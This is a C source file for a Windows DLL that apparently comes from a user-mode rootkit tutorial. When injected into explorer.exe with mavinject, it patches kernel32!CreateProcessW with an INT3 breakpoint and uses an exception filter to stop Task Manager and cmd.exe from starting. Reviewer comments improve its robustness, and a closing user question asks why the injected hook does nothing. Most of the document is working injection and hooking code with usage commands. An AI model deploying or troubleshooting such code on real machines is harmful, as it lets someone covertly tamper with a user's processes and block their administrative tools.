Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW; // address of kernel32!CreateProcessW; NULL until HookFunction() resolves it
BYTE bSavedByte;          // original first byte of CreateProcessW, replaced by 0xCC (INT3) while the hook is armed
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// Usage (replace 666 with the PID of the target process reported by tasklist):
//   tasklist | findstr explorer.exe
//   mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll
//
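// Overwrite `size` bytes at `fpFunc` (a code address) with the bytes at `b`.
// The page is temporarily made RWX, the bytes are copied, the instruction cache is
// flushed (the API contract for self-modifying code; required on architectures
// without a coherent I-cache) and the previous protection is restored.
// Returns FALSE on bad arguments or if either VirtualProtect call fails; if the
// *restore* fails the page is left PAGE_EXECUTE_READWRITE. The transient RWX page
// is itself a well-known detection signal for memory scanners.
// Not thread-safe: another thread can execute the half-written bytes during the copy
// (callers here write a single byte, which keeps that window minimal).
BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
    if (fpFunc == NULL || b == NULL || size == 0)
        return FALSE;
    LPVOID pTarget = (LPVOID)fpFunc;
    DWORD dwOldProt = 0;
    if (!VirtualProtect(pTarget, size, PAGE_EXECUTE_READWRITE, &dwOldProt))
        return FALSE;
    MoveMemory(pTarget, b, size);
    FlushInstructionCache(GetCurrentProcess(), pTarget, size);
    // Use a scratch variable so dwOldProt still holds the protection we are restoring.
    DWORD dwIgnored = 0;
    return VirtualProtect(pTarget, size, dwOldProt, &dwIgnored);
}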
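// Arm the hook: resolve kernel32!CreateProcessW (cached in fpCreateProcessW) and replace
// its first byte with INT3 (0xCC). Executing the patched entry raises EXCEPTION_BREAKPOINT,
// which MyUnhandledExceptionFilter redirects to MyCreateProcessW.
// Safe to call repeatedly (MyCreateProcessW re-arms after every real call): if the entry
// byte is already 0xCC, bSavedByte is left alone. The original unconditionally saved the
// current byte, so a second call would record 0xCC as the "original" and the hook could
// never be removed (every restore would re-plant the breakpoint).
// On failure the hook is simply not installed. The original called ExitThread(0) here,
// which terminated whatever thread was running the hook -- the injector's loader thread
// when called from DllMain, an application thread when called from MyCreateProcessW.
VOID HookFunction(VOID) {
    const BYTE bInt3 = 0xCC;
    if (fpCreateProcessW == NULL) {
        // kernel32 is mapped in every process; no LoadLibrary reference is needed.
        HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
        if (hKernel32 == NULL)
            return;
        fpCreateProcessW = GetProcAddress(hKernel32, "CreateProcessW");
        if (fpCreateProcessW == NULL)
            return;
    }
    const BYTE bCurrent = *(LPCBYTE)fpCreateProcessW;
    if (bCurrent == bInt3)
        return; // already armed (or some other breakpoint is there); do not overwrite bSavedByte
    bSavedByte = bCurrent;
    // A failed write leaves CreateProcessW unhooked, which is the safe failure mode.
    WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE));
}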
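// Case-insensitive (ordinal) substring test for wide strings; a NULL haystack never matches.
static BOOL ContainsNoCaseW(LPCWSTR haystack, LPCWSTR needle) {
    if (haystack == NULL || needle == NULL)
        return FALSE;
    const int needleLen = (int)wcslen(needle);
    const int hayLen = (int)wcslen(haystack);
    for (int pos = 0; pos + needleLen <= hayLen; ++pos) {
        if (CompareStringOrdinal(haystack + pos, needleLen, needle, needleLen, TRUE) == CSTR_EQUAL)
            return TRUE;
    }
    return FALSE;
}

// Replacement body for CreateProcessW. Control arrives here from the exception filter with
// the stack and registers exactly as at CreateProcessW's entry, so the signature must match
// the real export. Policy: refuse to start taskmgr.exe or cmd.exe (ERROR_ACCESS_DENIED);
// otherwise disarm the hook, call the real CreateProcessW, and re-arm it.
// Reviewer notes:
//  - The original matched only lpCommandLine with a case-sensitive wcsstr. lpCommandLine may
//    legitimately be NULL (crash), and the image may be supplied via lpApplicationName instead
//    (bypass), so both are now checked case-insensitively. This is still a demo-grade filter,
//    not a security boundary: "cmd" without extension, 8.3 short names, copies of the binary
//    under another name, and callers that do not enter through the CreateProcessW export
//    (CreateProcessA / CreateProcessAsUser are generally routed internally, not via this
//    export -- confirm on the target OS) all slip through.
//  - Between the byte restore and HookFunction() another thread may call CreateProcessW
//    unhooked; nothing here synchronizes that.
//  - A failed restore is reported as FALSE (last error from VirtualProtect) instead of the
//    original ExitThread(0), which killed the calling application thread.
//  - GetLastError from the real call is preserved across the re-arm so callers that check it
//    after a FALSE return still see the right code.
BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {
    static const LPCWSTR kBlocked[] = { L"taskmgr.exe", L"cmd.exe" };
    for (size_t i = 0; i < sizeof(kBlocked) / sizeof(kBlocked[0]); ++i) {
        if (ContainsNoCaseW(lpCommandLine, kBlocked[i]) || ContainsNoCaseW(lpApplicationName, kBlocked[i])) {
            SetLastError(ERROR_ACCESS_DENIED);
            return FALSE;
        }
    }
    // Disarm first, otherwise the call below would hit our own INT3 again.
    if (!WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)))
        return FALSE; // last error set by VirtualProtect inside WriteMemory
    const BOOL bResult = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
    const DWORD dwRealError = GetLastError();
    HookFunction(); // re-arm; may clobber last error, hence the save/restore
    SetLastError(dwRealError);
    return bResult;
}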
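// Top-level SEH filter that turns the INT3 planted on CreateProcessW into a call to
// MyCreateProcessW by rewriting the instruction pointer in the faulting context.
// Only an EXCEPTION_BREAKPOINT whose instruction pointer is exactly the patched entry is
// claimed; everything else gets EXCEPTION_CONTINUE_SEARCH. The original returned
// EXCEPTION_CONTINUE_EXECUTION for *every* unhandled exception in the process, which
// re-executes the faulting instruction forever instead of letting the process die or the
// next filter run.
// Limits of this mechanism (unchanged from the original design): the unhandled-exception
// filter is the last stop of the SEH search, so any __try/__except or catch(...) between the
// caller and CreateProcessW swallows the breakpoint first, and the filter is not invoked
// while a debugger is attached. A vectored handler (AddVectoredExceptionHandler) sees the
// breakpoint before any frame-based handler. The gist targets x64 (Rip); x86 (Eip) is added.
LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
    if (lpException == NULL || lpException->ExceptionRecord == NULL || lpException->ContextRecord == NULL)
        return EXCEPTION_CONTINUE_SEARCH;
    if (lpException->ExceptionRecord->ExceptionCode != EXCEPTION_BREAKPOINT || fpCreateProcessW == NULL)
        return EXCEPTION_CONTINUE_SEARCH;
#if defined(_M_X64) || defined(_M_AMD64)
    DWORD64 *pPc = &lpException->ContextRecord->Rip;
#elif defined(_M_IX86)
    DWORD *pPc = &lpException->ContextRecord->Eip;
#else
#error "MyUnhandledExceptionFilter: unsupported architecture (needs the CONTEXT program-counter field)"
#endif
    if (*pPc != (DWORD_PTR)fpCreateProcessW)
        return EXCEPTION_CONTINUE_SEARCH;
    *pPc = (DWORD_PTR)MyCreateProcessW;
    return EXCEPTION_CONTINUE_EXECUTION;
}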
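// DLL entry point. On process attach: install the top-level exception filter (remembering
// the one it replaces) and arm the hook. On dynamic unload (DLL_PROCESS_DETACH with
// lpReserved == NULL) undo both, so that after FreeLibrary neither the INT3 in kernel32 nor
// the filter pointer leads into unmapped memory -- the original never unhooked.
// Hook work happens under the loader lock because that is where the gist does it; the
// MessageBoxA is the demo's "it worked" banner and is kept for that reason, but user32
// calls from DllMain are a documented deadlock risk and should be removed for anything
// beyond a demo (do the work from a separate thread instead).
BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
    static LPTOP_LEVEL_EXCEPTION_FILTER s_pfnPreviousFilter = NULL;
    const BYTE bInt3 = 0xCC;
    if (fdwReason == DLL_PROCESS_ATTACH) {
        s_pfnPreviousFilter = SetUnhandledExceptionFilter(MyUnhandledExceptionFilter);
        ::MessageBoxA(NULL, "Boom!", "Injected", 0);
        HookFunction();
    } else if (fdwReason == DLL_PROCESS_DETACH && lpReserved == NULL) {
        // Best-effort unhook: only if our INT3 is still in place and we hold a real original byte.
        if (fpCreateProcessW != NULL && *(LPCBYTE)fpCreateProcessW == bInt3 && bSavedByte != bInt3)
            WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE));
        SetUnhandledExceptionFilter(s_pfnPreviousFilter);
    }
    return TRUE;
}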
Can you explain what I need to do to make it work? I compiled it and injected it, then ran a cmd command, but nothing happens.
